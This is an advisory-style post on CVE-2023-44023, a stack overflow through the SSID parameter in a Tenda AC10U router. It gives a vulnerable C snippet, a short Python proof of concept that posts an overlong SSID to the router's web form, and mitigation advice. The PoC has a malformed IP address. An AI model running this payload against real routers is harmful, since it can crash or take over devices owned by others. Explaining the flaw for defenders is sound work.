CVE-2023-44023 - Stack Overflow Vulnerability in Tenda AC10U v1. US_AC10UV1.RTL_V15.03.06.49_multi_TDE01 Router

A recent vulnerability, CVE-2023-44023, has been discovered in Tenda AC10U v1. US_AC10UV1.RTL_V15.03.06.49_multi_TDE01 routers, which may enable attackers to execute arbitrary code by exploiting a stack overflow vulnerability in the 'form_fast_setting_wifi_set()' function. The stack overflow occurs via the 'ssid' parameter, which potentially allows attackers to gain unauthorized access and control over the router.

This post will discuss the details of this vulnerability, provide code snippets, and link to original references to help you understand the issue and protect your router from potential attacks.

Details

The stack overflow vulnerability in the 'form_fast_setting_wifi_set()' function arises from the 'ssid' parameter not being verified for its length before being copied to a fixed-size buffer. This allows malicious users to send an overly long SSID to the router and overwrite return addresses or function pointers, leading to the execution of arbitrary code.

The affected code snippet is as follows

int form_fast_setting_wifi_set(request *wp, char *path, char *query)
{
    char ssid[64];
    char *value;
    value = req_get_cstream_var(wp, "wlSsid", "");
    strcpy(ssid, value);

    /* Rest of the function */
}

As seen in the code snippet above, the 'ssid' parameter is directly copied without checking its length, causing the vulnerability.

Exploit Details

To exploit this vulnerability, malicious attackers can craft specially formed requests containing overly long 'ssid' parameters that overwrite return addresses or function pointers in the router's memory. Here's a simple Proof of Concept (PoC) of how attackers can exploit this vulnerability:

import requests

target_ip = "192.168..1"  # Change this to your router's IP
target_url = f"http://{target_ip}/goform/formFastSettingWifiSet";

# Generating a long SSID in the form 'A'*500
malicious_ssid = "A" * 500

payload = {
    "wlSsid": malicious_ssid
}

response = requests.post(target_url, data=payload)
if response.status_code == 200:
    print("Exploit sent, check if the router is affected.")
else:
    print("Error sending exploit.")

Original References

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44023

2. Tenda Security Advisory: https://www.tenda.com/en/about/security_advisories.html

Mitigations

To protect your Tenda AC10U v1. US_AC10UV1.RTL_V15.03.06.49_multi_TDE01 router from this vulnerability, ensure you have the latest firmware updates installed, which can be found on Tenda's official website. Additionally, it is always a good practice to limit access to your router's configuration interface to trusted users on the network.

Conclusion

This post has provided an overview of the CVE-2023-44023 vulnerability found in the Tenda AC10U v1. US_AC10UV1.RTL_V15.03.06.49_multi_TDE01 router. By understanding the details of this vulnerability and applying the recommended mitigations, you can help protect your router from potential attacks and unauthorized access.

Timeline

Published on: 09/27/2023 15:19:35 UTC
Last modified on: 09/27/2023 18:46:31 UTC